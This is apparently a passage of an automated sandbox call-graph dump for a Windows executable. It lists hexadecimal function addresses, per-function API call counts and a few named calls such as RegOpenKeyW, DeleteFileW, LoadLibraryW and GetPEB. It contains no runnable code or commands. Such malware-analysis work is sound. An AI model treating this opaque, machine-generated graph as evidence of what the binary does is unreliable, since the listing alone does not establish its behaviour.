API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 